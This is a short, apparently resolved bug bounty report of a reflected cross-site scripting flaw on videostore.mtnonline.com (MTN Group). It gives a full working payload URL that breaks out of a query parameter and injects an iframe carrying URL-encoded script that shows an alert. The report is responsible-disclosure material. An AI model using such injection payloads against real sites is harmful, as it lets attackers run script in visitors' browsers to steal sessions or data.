Reflected xss on videostore.mtnonline.com
High
M
MTN Group
Submitted None
Actions:
Reported by
possowski
Vulnerability Details
Technical details and impact analysis
## Summary:
Hi,
I found reflected xss vuln on videostore.mtnonline.com
## Steps To Reproduce:
1. Open browser
2. Go to ``https://videostore.mtnonline.com/GL/Default.aspx?PId=126&CId=5&OprId=11&Ctg=OF25MTNNGVS_LapsInTime%22%27testxxx%3E%3Ciframe%20src=%22blocked:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E%22%3E%3C/iframe%3E`` url
3. Browser show alert popup
## Impact
We can run javascript code
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected